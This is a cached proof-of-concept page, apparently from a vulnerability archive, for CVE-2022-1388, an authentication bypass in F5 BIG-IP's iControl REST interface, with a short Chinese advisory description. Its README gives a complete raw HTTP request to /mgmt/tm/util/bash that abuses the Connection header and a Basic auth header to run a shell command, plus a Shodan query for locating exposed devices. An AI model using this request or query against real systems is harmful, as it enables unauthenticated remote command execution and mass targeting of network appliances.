Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
Description
PoC for CVE-2022-1388_F5_BIG-IP
Readme
**CVE-2022-1388** **EXPLOIT** **POC** **[F5 BIG IP]**

```
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive,X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: SherlockSecure
Content-Type: application/json
Authorization: Basic YWRtaW46aG9yaXpvbjM=

{
"command":"run",
"utilCmdArgs":"-c id"
}
```

![Poc](https://i.imgur.com/c83ch8h.png)


**SHODAN QUERY**
 ```http.title:"BIG-IP®-+Redirect" +"Server"```
File Snapshot

[4.0K] /data/pocs/52ce8d6bb32f168e74d456c2c81f5843d5d48246 ├── [ 285] poc.txt └── [ 460] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.